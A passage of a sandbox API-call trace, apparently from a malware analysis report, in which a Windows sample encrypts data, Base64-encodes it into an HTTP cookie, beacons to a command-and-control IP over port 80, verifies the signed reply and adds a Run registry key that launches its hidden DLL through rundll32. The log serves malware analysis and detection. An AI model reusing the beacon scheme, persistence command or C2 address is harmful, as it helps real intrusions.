cAlternateFileName="")) returned 1 [0221.028] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0221.028] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0221.028] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0221.028] FindClose (in: hFindFile=0x2b5fe68 | out: hFindFile=0x2b5fe68) returned 1 [0221.029] GetProcessHeap () returned 0x530000 [0221.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0221.029] GetProcessHeap () returned 0x530000 [0221.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8d98 [0221.029] GetProcessHeap () returned 0x530000 [0221.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1780 [0221.029] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0221.030] GetProcessHeap () returned 0x530000 [0221.030] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8d98 | out: hHeap=0x530000) returned 1 [0221.030] GetProcessHeap () returned 0x530000 [0221.031] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1780 | out: hHeap=0x530000) returned 1 [0221.031] GetProcessHeap () returned 0x530000 [0221.031] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0221.031] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0221.031] GetProcessHeap () returned 0x530000 [0221.032] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0221.032] GetProcessHeap () returned 0x530000 [0221.032] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0221.032] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0221.032] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0221.032] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0221.032] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0221.032] GetProcessHeap () returned 0x530000 [0221.032] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0221.032] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0221.032] GetProcessHeap () returned 0x530000 [0221.032] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0221.033] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0221.033] GetProcessHeap () returned 0x530000 [0221.033] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0221.033] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0221.033] GetProcessHeap () returned 0x530000 [0221.033] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x2996ac0 [0221.033] GetProcessHeap () returned 0x530000 [0221.033] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0221.033] GetProcessHeap () returned 0x530000 [0221.033] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0221.033] CryptBinaryToStringW (in: pbBinary=0x2996ac0, cbBinary=0xd2, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0221.033] GetProcessHeap () returned 0x530000 [0221.033] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x232) returned 0x5edef0 [0221.034] CryptBinaryToStringW (in: pbBinary=0x2996ac0, cbBinary=0xd2, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTl3cgN1BA+UqppYAcGiWq05dbXDCN1/ryyWdqt/o/knyd1EOBw4G3Z4OV4X9y1r5w/AF", pcchString=0x2cf504) returned 1 [0221.034] GetProcessHeap () returned 0x530000 [0221.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0221.034] GetProcessHeap () returned 0x530000 [0221.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0221.034] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: dJj=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTl3cgN1BA+UqppYAcGiWq05dbXDCN1/ryyWdqt/o/knyd1EOBw4G3Z4OV4X9y1r5w/AF\r\n") returned 294 [0221.034] GetProcessHeap () returned 0x530000 [0221.034] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0221.034] GetProcessHeap () returned 0x530000 [0221.034] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0221.034] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0221.035] GetProcessHeap () returned 0x530000 [0221.035] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0221.035] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0221.036] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="NSqcpi", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0221.037] GetProcessHeap () returned 0x530000 [0221.037] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0221.037] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0221.037] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0221.037] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0221.037] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: dJj=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTl3cgN1BA+UqppYAcGiWq05dbXDCN1/ryyWdqt/o/knyd1EOBw4G3Z4OV4X9y1r5w/AF\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0222.186] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0222.186] GetProcessHeap () returned 0x530000 [0222.186] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0222.186] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x1cf) returned 1 [0222.186] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47fcf, dwNumberOfBytesToRead=0xfe31, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47fcf*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0222.187] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0222.187] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0222.187] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0222.187] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0222.187] GetProcessHeap () returned 0x530000 [0222.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0222.187] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0222.187] GetProcessHeap () returned 0x530000 [0222.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0222.187] GetProcessHeap () returned 0x530000 [0222.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1780 [0222.187] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0222.188] GetProcessHeap () returned 0x530000 [0222.188] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0222.188] GetProcessHeap () returned 0x530000 [0222.188] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1780 | out: hHeap=0x530000) returned 1 [0222.188] GetProcessHeap () returned 0x530000 [0222.188] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0222.188] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0222.188] GetProcessHeap () returned 0x530000 [0222.188] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0222.189] GetProcessHeap () returned 0x530000 [0222.189] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0222.189] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0222.189] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0222.189] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0222.189] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0222.189] GetProcessHeap () returned 0x530000 [0222.189] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0222.189] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0222.189] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0222.191] GetProcessHeap () returned 0x530000 [0222.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6c0 [0222.191] GetProcessHeap () returned 0x530000 [0222.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0222.191] GetProcessHeap () returned 0x530000 [0222.192] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0222.192] GetProcessHeap () returned 0x530000 [0222.192] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996ac0 | out: hHeap=0x530000) returned 1 [0222.192] GetProcessHeap () returned 0x530000 [0222.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0222.193] GetProcessHeap () returned 0x530000 [0222.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0222.193] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0222.193] GetProcessHeap () returned 0x530000 [0222.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2b5fee8 [0222.193] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gcDsvzmp") returned 98 [0222.193] GetProcessHeap () returned 0x530000 [0222.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5fee8 | out: hHeap=0x530000) returned 1 [0222.193] GetProcessHeap () returned 0x530000 [0222.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0222.194] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x640, lpdwDisposition=0x0) returned 0x0 [0222.194] GetProcessHeap () returned 0x530000 [0222.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0222.194] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gcDsvzmp") returned 98 [0222.195] RegSetValueExW (in: hKey=0x640, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gcDsvzmp", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gcDsvzmp") returned 0x0 [0222.195] RegCloseKey (hKey=0x640) returned 0x0 [0222.196] GetProcessHeap () returned 0x530000 [0222.196] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6c0 | out: hHeap=0x530000) returned 1 [0222.196] GetProcessHeap () returned 0x530000 [0222.196] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0222.196] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xde185) returned 0x102 [0232.428] GetProcessHeap () returned 0x530000 [0232.428] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5f2b08 [0232.428] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0232.428] GetProcessHeap () returned 0x530000 [0232.428] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5f2b08 | out: hHeap=0x530000) returned 1 [0232.428] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0232.428] GetProcessHeap () returned 0x530000 [0232.428] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5f2b08 [0232.428] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0232.428] GetProcessHeap () returned 0x530000 [0232.428] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5f2b08 | out: hHeap=0x530000) returned 1 [0232.428] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2b5fea8 [0232.429] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0232.429] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0232.429] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0232.429] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0232.429] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0232.429] FindClose (in: hFindFile=0x2b5fea8 | out: hFindFile=0x2b5fea8) returned 1 [0232.430] GetProcessHeap () returned 0x530000 [0232.430] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0232.430] GetProcessHeap () returned 0x530000 [0232.430] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5f2b08 [0232.430] GetProcessHeap () returned 0x530000 [0232.430] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0232.430] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0232.987] GetProcessHeap () returned 0x530000 [0232.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5f2b08 | out: hHeap=0x530000) returned 1 [0232.987] GetProcessHeap () returned 0x530000 [0232.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0232.988] GetProcessHeap () returned 0x530000 [0232.988] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0232.988] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0232.988] GetProcessHeap () returned 0x530000 [0232.988] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0232.988] GetProcessHeap () returned 0x530000 [0232.988] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0232.988] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0232.988] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0232.988] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0232.988] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0232.988] GetProcessHeap () returned 0x530000 [0232.989] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0232.989] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0232.989] GetProcessHeap () returned 0x530000 [0232.989] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0232.989] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0232.989] GetProcessHeap () returned 0x530000 [0232.989] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0232.989] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0232.989] GetProcessHeap () returned 0x530000 [0232.989] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf3) returned 0x5e2d70 [0232.989] GetProcessHeap () returned 0x530000 [0232.989] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0232.990] GetProcessHeap () returned 0x530000 [0232.990] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0232.990] CryptBinaryToStringW (in: pbBinary=0x5e2d70, cbBinary=0xf3, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0232.990] GetProcessHeap () returned 0x530000 [0232.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28a) returned 0x2b65430 [0232.990] CryptBinaryToStringW (in: pbBinary=0x5e2d70, cbBinary=0xf3, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTong96Z0/ThqUy+PKq8A6KfMqPVS+4bMw9TeGLn8s74gEgIUiOpAAgopbYruD9jpvJpDm/Uni/NG9cwgLrPqkhzM+umqnv+6tmY1LrgFsXZyoRbN", pcchString=0x2cf504) returned 1 [0232.990] GetProcessHeap () returned 0x530000 [0232.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0232.990] GetProcessHeap () returned 0x530000 [0232.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f18 [0232.990] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 